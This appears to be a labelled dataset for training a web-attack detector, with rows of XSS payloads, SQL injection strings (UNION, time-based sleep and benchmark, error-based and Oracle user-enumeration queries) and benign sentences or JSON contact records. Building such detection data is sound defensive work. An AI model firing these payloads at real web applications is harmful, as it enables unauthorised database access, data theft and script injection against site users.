src=""vbscript:document.vulnerable=true;"">",1,XSS,5719 "1"" ) where 1144 = 1144 and 2006 = 2006",2,SQLi,19752 "<iframe/src=""data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="">",1,XSS,2031 "The following is a select list of genera of stove plants (climbers are denoted by *, bulbous and tuberous plants by f) Acalypha Achimenest Aeschynanthus Allamanda* Alocasiat Amaryllist Anthurium Aphelandra Aralia Ardisia Arisaemaf Aristolochia * Ataccia Begonia Bertolonia Bignonia* Bromeliads Cactus Caladium f Calathea Centropogon Cissus* Clerodendron * Crinumt Codiaeum (Croton) ORcftIDs.",3,normal,25445 "{""id"":null,""firstName"":""桂英"",""lastName"":""桂英"",""address"":""46 Lor 32 Geylang S()"",""city"":""990"",""telephone"":""4868975261""}",3,normal,27401 "<iframe src=""http://www.example.org/dropHere.html""></iframe>//[""'`-->]]>]</div>",1,XSS,2059 "1' where 1230 = 1230 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11272 "The discrepancies produced in this way are, however, very small, if care is taken to minimize the distance between the silver film and the photographic plate and to select a reasonably good piece of glass for the reseau.",3,normal,25463 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual ) ||'",2,SQLi,13799 "{""id"":null,""name"":""leader""}",3,normal,27066 "1"" or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ""kbex"" like ""kbex",2,SQLi,12453 "<IMG SRC=x onplay=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3996 "<thead onmousemove=""alert(1)"">test</thead>",1,XSS,7565 "{""id"":null,""firstName"":""Luke"",""lastName"":""Yiin"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26986 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( ( 'lqwz' = 'lqwz",2,SQLi,15995 "1%' ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( '%' = '",2,SQLi,12939 "{""id"":null,""name"":""powerful""}",3,normal,27220 Select item.,3,normal,24558 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16",2,SQLi,15829 "javascript:/*""//'//`//\""//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script>",1,XSS,496 "-2500' ) ) ) union all select 6853,6853,6853,6853--",2,SQLi,18396 "<frameset draggable=""true"" ondragleave=""alert(1)"">test</frameset>",1,XSS,2818 "<tt onmousemove=""alert(1)"">test</tt>",1,XSS,8941 I need to decide where to have lunch today.,3,normal,23763 x' AND email IS NULL; --,2,SQLi,21168 1'+ ( select 'vjoj' where 5348 = 5348,2,SQLi,19844 "-1055"" or ( 8459 = 8459 ) *4906 and ""kdbr"" = ""kdbr",2,SQLi,18438 "<slot draggable=""true"" ondragenter=""alert(1)"">test</slot>",1,XSS,4100 or '1'='1'/*,2,SQLi,22276 "Once you select Grayscale, your screen will immediately switch over.",3,normal,25833 <hgroup onpointerout=alert(1)>XSS</hgroup>,1,XSS,7504 -8836%' ) or 4856 = 3891,2,SQLi,21228 <script>alert(123)</script>,1,XSS,9649 "1%"" ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( ""%"" = """,2,SQLi,16933 "{""id"":null,""name"":""Kangaroo""}",3,normal,27258 Select a recipe for a delicious meal.,3,normal,24090 <figcaption onblur=alert(1) tabindex=1 id=x></figcaption><input autofocus>,1,XSS,2290 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) #",2,SQLi,16007 "<div draggable=""true"" contenteditable>drag me</div><em ondrop=alert(1) contenteditable>drop here</em>",1,XSS,1410 "1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 'yqhk' = 'yqhk",2,SQLi,12186 "{""id"":null,""firstName"":""Jayden"",""lastName"":""Shen"",""address"":""1301 GREENE STREET, MARIETTA OH 45750"",""city"":""564"",""telephone"":""5314749000""}",3,normal,27462 "<div draggable=""true"" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary>",1,XSS,975 "1' in boolean mode ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #",2,SQLi,11241 "{""id"":null,""firstName"":""Jin Le Joyce"",""lastName"":""Nai"",""address"":"" Inflight Catering Centre 55 Airport Boulevard #6"",""city"":""932"",""telephone"":""405510353""}",3,normal,27179 <time onpointerdown=alert(1)>XSS</time>,1,XSS,8156 "1"" union all select null,null,null,null,null,null,null#",2,SQLi,17842 <head onpointerover=alert(1)>XSS</head>,1,XSS,8207 Group data where valid.,3,normal,23308 "-9535"" order by 1--",2,SQLi,21966 1'|| ( select 'dsjg' where 2402 = 2402 and 1947 = 7472--,2,SQLi,17713 "1'|| ( select 'ejuu' from dual where 2903 = 2903 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) ||'",2,SQLi,11792 Select your drift.,3,normal,25028 "-6595"" order by 1--",2,SQLi,21964 1'+ ( select hrgu where 9587 = 9587,2,SQLi,20102 "<shadow onkeypress=""alert(1)"" contenteditable>test</shadow>",1,XSS,3680 "<font oncut=""alert(1)"" contenteditable>test</font>",1,XSS,5683 "select * from users where id = '1' union select @ @1,version ( ) -- 1'",2,SQLi,16138 "-2276"" ) ) as qwow where 2321 = 2321 or 3534 = 2971--",2,SQLi,18067 "<bdi oncontextmenu=""alert(1)"">test</bdi>",1,XSS,7965 1 ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 7594 = 7594,2,SQLi,10677 "{""id"":null,""name"":""concerned remember courage""}",3,normal,27616 <main onpointerenter=alert(1)>XSS</main>,1,XSS,7857 1' ) ) waitfor delay '0:0:5' and ( ( 'amnf' like 'amnf,2,SQLi,17983 "<div draggable=""true"" contenteditable>drag me</div><ol ondrop=alert(1) contenteditable>drop here</ol>",1,XSS,1401 "<data onmouseout=""alert(1)"">test</data>",1,XSS,8215 "-3731' ) ) ) or elt ( 7540 = 1412,1412 ) and ( ( ( 'iwch' = 'iwch",2,SQLi,16735 "1' ) ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15394 &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;,1,XSS,508 -7786' ) ) or 9323 = 9323#,2,SQLi,20963 "<style>:target {transform: rotate(180deg);}</style><legend id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></legend>",1,XSS,596 "<strike oncopy=""alert(1)"" contenteditable>test</strike>",1,XSS,4551 -8453 ) ) ) or 3038 = 3038,2,SQLi,21012 "1' ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11757 "-5616"" ) ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""hdrb"" like ""hdrb",2,SQLi,10067 "{""id"":null,""firstName"":""Susie"",""lastName"":""Tijo"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27177 "1"" ) where 7578 = 7578 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12355 <tfoot onpointerup=alert(1)>XSS</tfoot>,1,XSS,8111 <del id=x tabindex=1 ondeactivate=alert(1)></del><input id=y autofocus>,1,XSS,2475 "<s onpaste=""alert(1)"" contenteditable>test</s>",1,XSS,6351 "<xmp draggable=""true"" ondragenter=""alert(1)"">test</xmp>",1,XSS,4594 "1%"" ) and elt ( 4249 = 4249,7259 ) and ( ""%"" = """,2,SQLi,18790 "1"" ) ) ) union all select null,null--",2,SQLi,19849 <colgroup id=x tabindex=1 onbeforedeactivate=alert(1)></colgroup><input autofocus>,1,XSS,1924 "{""id"":null,""firstName"":""Valerie"",""lastName"":""Goh"",""address"":""6 Battery Road 31-00 Six Battery Road Building"",""city"":""658"",""telephone"":""6072057963""}",3,normal,27438 "1"" ) as tqxa where 6751 = 6751 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11105 "1%"" ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ""%"" = """,2,SQLi,13408 1' ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( 'mqoj' like 'mqoj,2,SQLi,15108 -4322' ) ) as magw where 1627 = 1627 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,10073 &lt;/BODY&gt;&lt;/HTML&gt;,1,XSS,9669 <option onpointerdown=alert(1)>XSS</option>,1,XSS,7164 "1 ) ) as yfvg where 1454 = 1454 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10558 "{""id"":null,""name"":""that tiny""}",3,normal,26832 "Macy's is offering major savings across departments, including 60% off select women's boots and shoes, 65% off select men's jackets, 60% – 70% off select comforters and pillows, 30% plus an extra 20% off KitchenAid mixers and attachments, and an extra 20% off select sale and clearance clothing.",3,normal,25901 "<span onmouseover=""alert(1)"">test</span>",1,XSS,7900 "1' ) ) ) and make_set ( 7539 = 3946,3946 ) and ( ( ( 'qbpo' = 'qbpo",2,SQLi,16521 <button onReadyStateChange=javascript:alert(1)>,1,XSS,6262 <link onpointerover=alert(1)>XSS</link>,1,XSS,8145 "1"" ) ) as femc where 1313 = 1313 and 4595 = 4595#",2,SQLi,18575 <cite id=x tabindex=1 onbeforeactivate=alert(1)></cite>,1,XSS,4591 "1' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ( 'mbxh' like 'mbxh",2,SQLi,16009 Article: Select items up to 25% off (through July 9).,3,normal,26360 <menuitem onpointerover=alert(1)>XSS</menuitem>,1,XSS,6198 "1'+ ( select yfuu where 1717 = 1717 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,14171 <button onBegin=javascript:alert(1)>,1,XSS,8969 "elt ( 2427 = 2427,5518 )",2,SQLi,21232 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( 'jloi' = 'jloi",2,SQLi,15568 "<small onkeypress=""alert(1)"" contenteditable>test</small>",1,XSS,4132 <param id=x tabindex=1 onfocus=alert(1)></param>,1,XSS,6009 "1"" order by 1--",2,SQLi,22179 "1' and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,11436 "<style>:target {color:red;}</style><samp id=x style=""transition:color 1s"" ontransitionend=alert(1)></samp>",1,XSS,1219 "1'+ ( select xlvq where 7470 = 7470 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) +'",2,SQLi,12061 "<header onmousemove=""alert(1)"">test</header>",1,XSS,6830 "<div draggable=""true"" contenteditable>drag me</div><bgsound ondrop=alert(1) contenteditable>drop here</bgsound>",1,XSS,963 Let's explore where the hiking trail leads.,3,normal,23748 "<a onmousemove=""alert(1)"">test</a>",1,XSS,9235 <big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus>,1,XSS,2393 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><h1 id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></h1>",1,XSS,281 <noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus>,1,XSS,1956 <frameset onpointerout=alert(1)>XSS</frameset>,1,XSS,6323 <track id=x tabindex=1 onfocus=alert(1)></track>,1,XSS,6057 "1 ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,11242 "-6368' union all select 6529,6529,6529--",2,SQLi,19485 "<style>@keyframes x{}</style><div style=""animation-name:x"" onanimationend=""alert(1)""></div>",1,XSS,1742 "{""id"":null,""name"":""cake""}",3,normal,26817 <animate onpointermove=alert(1)>XSS</animate>,1,XSS,6599 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( 'nbzf' like 'nbzf,2,SQLi,15593 <svg onpointerdown=alert(1)>XSS</svg>,1,XSS,8652 "select * from users where id = 1.*1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,14430 "1' ) ) as hmyc where 6732 = 6732 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11844 <fieldset onpointerenter=alert(1)>XSS</fieldset>,1,XSS,5964 -3096' or 3821 = 5539 and 'zrth' = 'zrth,2,SQLi,19458 "Simply go to your photo or attachment stack, select and upload.",3,normal,25553 "<style>@keyframes x{}</style><basefont style=""animation-name:x"" onanimationstart=""alert(1)""></basefont>",1,XSS,1347 <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>,1,XSS,65 grant connect to name; grant resource to name;,2,SQLi,18909 "1"" ) ) as iubt where 8179 = 8179 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12484 Plant a flowering tree.,3,normal,22732 1 ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( 3069 = 3069,2,SQLi,16065 "<address draggable=""true"" ondragenter=""alert(1)"">test</address>",1,XSS,3031 "-6626%"" ) or 1744 = 5292 and ( ""%"" = """,2,SQLi,19686 I need to decide where to go for a nature walk.,3,normal,23955 "1' ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( 'yqmv' = 'yqmv",2,SQLi,10426 ; execute immediate 'sel' || 'ect us' || 'er',2,SQLi,18987 "While it was once fashionable to give your baby a long, elegant-sounding name, the latest trend is to select names that are short and sweet.",3,normal,25136 Start the Music app and select a song to play.,3,normal,25528 "<keygen onbeforepaste=""alert(1)"" contenteditable>test</keygen>",1,XSS,3194 "{""id"":null,""firstName"":""Tony"",""lastName"":""Wang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27237 "For graphical representation we select units of length L and M, not necessarily identical.",3,normal,26182 "<style>@keyframes x{}</style><isindex style=""animation-name:x"" onanimationend=""alert(1)""></isindex>",1,XSS,1456 "<if expr=""new ActiveXObject('htmlfile').parentWindow.alert(2)""></if>",1,XSS,2655 <s onpointerup=alert(1)>XSS</s>,1,XSS,9495 "1"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ""hmun"" = ""hmun",2,SQLi,11667 "<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">",1,XSS,2600 1 ) where 1096 = 1096,2,SQLi,21632 "<cite onclick=""alert(1)"">test</cite>",1,XSS,8827 "<frameset onFocus frameset onFocus=""javascript:javascript:alert(1)""></frameset onFocus>",1,XSS,1819 "1 or elt ( 6272 = 6272,sleep ( 5 ) ) -- ilfc",2,SQLi,19091 "-9122 ) as sdlg where 1546 = 1546 union all select 1546,1546,1546,1546,1546,1546,1546--",2,SQLi,14821 "<span onmouseout=""alert(1)"">test</span>",1,XSS,8256 1 or sleep ( __TIME__ ) #,2,SQLi,21042 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( 'xcnj' = 'xcnj",2,SQLi,14078 <svg/onload=%26%23097lert%26lpar;1337)>,1,XSS,8100 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( 'xaoi' = 'xaoi",2,SQLi,13528 <textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea>,1,XSS,3100 1' ) and 7290 = 8416 and ( 'ktlz' like 'ktlz,2,SQLi,19102 "<IMG SRC=x onsuspend=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3448 "-3411' ) ) ) union all select 3185,3185,3185,3185,3185,3185,3185,3185--",2,SQLi,16090 "1"" ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13380 �script�alert(�XSS�)�/script�,1,XSS,9587 "-6381%"" or 8571 = 8571--",2,SQLi,21233 1' ) as jztg where 1222 = 1222 or sleep ( 5 ) #,2,SQLi,18853 "<i oncut=""alert(1)"" contenteditable>test</i>",1,XSS,6825 "<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-",1,XSS,635 1' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ( 'odsl' like 'odsl,2,SQLi,15099 1' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'hbwk' like 'hbwk,2,SQLi,10139 <input2 onpointerenter=alert(1)>XSS</input2>,1,XSS,6964 "1' in boolean mode ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14605 "1 ) ) as fmpr where 3103 = 3103 and elt ( 9970 = 9297,9297 ) --",2,SQLi,16852 "<div style=""binding: url([link to code]);"">",1,XSS,7083 "<IMG SRC=x onmousemove=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3134 "1 ) as wxms where 7272 = 7272 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12286 "1' union all select null,null,null,null,null,null--",2,SQLi,18349 "1%' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and '%' = '",2,SQLi,11917 <div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus>,1,XSS,2942 "Operators conveniently omit this evidence when quoting from reports, and only select the parts that indicate an inconclusive result.",3,normal,25813 "1' ) as ybuv where 9641 = 9641 union all select null,null,null,null,null,null,null,null--",2,SQLi,14729 "<style>:target {color:red;}</style><strike id=x style=""transition:color 1s"" ontransitionend=alert(1)></strike>",1,XSS,1034 "1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # urzg",2,SQLi,11363 1 ) where 1090 = 1090 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12930 "<a href=""\x11javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2425 or 1=1 LIMIT 1;#,2,SQLi,22115 Select soup.,3,normal,24501 <bdo id=x tabindex=1 onfocus=alert(1)></bdo>,1,XSS,6807 "UNION SELECT @@VERSION,SLEEP(5),3",2,SQLi,20181 "1%' ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11653 ORDER BY 10,2,SQLi,22368 Let's select toppings.,3,normal,24799 "1"" where 8016 = 8016",2,SQLi,21753 "{""id"":null,""name"":""Narwhal""}",3,normal,27238 "-9032 ) ) union all select 8377,8377,8377,8377,8377,8377,8377,8377,8377#",2,SQLi,15997 Where did you find that unique sculpture?,3,normal,23869 "<style>:target {transform: rotate(180deg);}</style><del id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></del>",1,XSS,681 Select help.,3,normal,24742 "<base draggable=""true"" ondragleave=""alert(1)"">test</base>",1,XSS,4171 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ( 'ksoc' = 'ksoc,2,SQLi,15776 <keygen autofocus onfocusin=alert(1)>,1,XSS,8602 "-2216"" ) where 6692 = 6692 union all select 6692,6692,6692#",2,SQLi,17279 Join the yoga class.,3,normal,22714 "Their job — Ivry's job — was to eliminate targets, not select them.",3,normal,25352 <meter id=x tabindex=1 onbeforeactivate=alert(1)></meter>,1,XSS,4124 \'-alert(1)//,1,XSS,9818 "top[""al""+""ert""](1)",1,XSS,9790 ;sleep 5,2,SQLi,22503 <svg onload=alert(1)//,1,XSS,9748 "<rtc onmouseenter=""alert(1)"">test</rtc>",1,XSS,8143 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bgsound id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></bgsound>",1,XSS,172 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ""layz"" = ""layz",2,SQLi,13120 <kbd onfocusout=alert(1) tabindex=1 id=x></kbd><input autofocus>,1,XSS,2884 "<caption onbeforecut=""alert(1)"" contenteditable>test</caption>",1,XSS,3207 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--",2,SQLi,15073 1' where 5778 = 5778,2,SQLi,21893 in,3,normal,23142 Can you help me decide where to visit?,3,normal,23924 "-1844' ) union all select 9572,9572,9572,9572#",2,SQLi,18964 "<style>:target {color:red;}</style><center id=x style=""transition:color 1s"" ontransitionend=alert(1)></center>",1,XSS,1035 1'|| ( select 'nvvm' from dual where 5567 = 5567 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) ) ||',2,SQLi,13621 Update your profile details with accuracy.,3,normal,22988 1 ) or sleep ( 5 ) and ( 2211 = 2211,2,SQLi,20003 "<style>@keyframes x{}</style><menuitem style=""animation-name:x"" onanimationend=""alert(1)""></menuitem>",1,XSS,1387 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( 'ufbr' = 'ufbr",2,SQLi,13997 "<style>:target {color:red;}</style><sup id=x style=""transition:color 1s"" ontransitionend=alert(1)></sup>",1,XSS,1297 "<ol onmousedown=""alert(1)"">test</ol>",1,XSS,8878 x' or 1=1 or 'x'='y,2,SQLi,21914 Where's the perfect spot to watch the sunrise?,3,normal,23769 "<x '=""foo""><x foo='><img src=x onerror=javascript:alert(1)//'>",1,XSS,3128 1)) or sleep(5)#,2,SQLi,22123 1 ) ) as mlpf where 7425 = 7425,2,SQLi,20405 "Open the Preview app on your Mac and select the file you wish to highlight through the ""File"" menu option, where you can select ""Open…"" to locate a file.",3,normal,25814 "1 ) ) union all select null,null,null,null,null,null,null--",2,SQLi,17253 <hr id=x tabindex=1 onfocus=alert(1)></hr>,1,XSS,7363 "<th onmouseover=""alert(1)"">test</th>",1,XSS,8874 "1%"" ) ) union all select null,null,null,null,null,null#",2,SQLi,17754 "<head><base href=""javascript://""></head><body><a href=""/. /,javascript:alert(1)//#"">XXX</a></body>",1,XSS,1499 "select * from users where id = '1' or @ ( 1 ) = 1 union select 1,version ( ) -- 1'",2,SQLi,15081 ; alert(document.cookie); var foo=',1,XSS,8995 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( '%' = '",2,SQLi,16844 "<style>:target {color: red;}</style><datalist id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></datalist>",1,XSS,749 Sort wires.,3,normal,23069 "1"" ) as paai where 4089 = 4089 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12245 "<basefont onmouseover=""alert(1)"">test</basefont>",1,XSS,5983 "1' ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17148 Please select a color scheme.,3,normal,24413 "<body onFocus body onFocus=""javascript:javascript:alert(1)""></body onFocus>",1,XSS,2208 "<basefont onkeypress=""alert(1)"" contenteditable>test</basefont>",1,XSS,3058 1' and 4595 = 4595#,2,SQLi,21995 "<bgsound onclick=""alert(1)"">test</bgsound>",1,XSS,7382 "<style>:target {transform: rotate(180deg);}</style><dialog id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></dialog>",1,XSS,592 -9509' ) ) ) or 1091 = 5477 and ( ( ( 'gsmz' = 'gsmz,2,SQLi,18201 <output onpointerout=alert(1)>XSS</output>,1,XSS,7511 <datalist id=x tabindex=1 onfocusin=alert(1)></datalist>,1,XSS,4230 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i",2,SQLi,11905 "admin"" or 1 = 1",2,SQLi,22167 "<style>@keyframes x{}</style><applet style=""animation-name:x"" onanimationstart=""alert(1)""></applet>",1,XSS,1493 <frameset onpointerup=alert(1)>XSS</frameset>,1,XSS,6572 "1"" ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11380 "-9736' or make_set ( 7311 = 2067,2067 ) and 'czdt' like 'czdt",2,SQLi,17021 "{""id"":null,""firstName"":""Jeff"",""lastName"":""Lam Tian Hung"",""address"":""101 CHESAPEAKE BLVD, ELKTON MD 21921"",""city"":""6"",""telephone"":""2125100154""}",3,normal,26910 I'm thinking of where to take a cooking class.,3,normal,23853 "-4280%"" ) ) ) union all select 7981,7981--",2,SQLi,19288 "<track onmouseleave=""alert(1)"">test</track>",1,XSS,7092 "<br onbeforecut=""alert(1)"" contenteditable>test</br>",1,XSS,5267 "1"" ) ) union all select null,null,null,null,null,null,null--",2,SQLi,17155 <input oninput=alert(1) value=xss>,1,XSS,9157 "<IMG SRC=x ondragstart=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3138 <svg><samp onload=alert(1)></samp>,1,XSS,9265 <base onpointerup=alert(1)>XSS</base>,1,XSS,8725 "1'+ ( select jxgx where 7446 = 7446 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12095 Sort the alphabet blocks by letter.,3,normal,22950 "-6253' union all select 5756,5756,5756,5756,5756,5756,5756,5756,5756,5756#",2,SQLi,15779 <button onEnd=javascript:alert(1)>,1,XSS,9304 "1' ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11662 "1"" ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ""rtyu"" like ""rtyu",2,SQLi,11502 "<code oncontextmenu=""alert(1)"">test</code>",1,XSS,7559 """+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23",2,SQLi,18657 "<h1 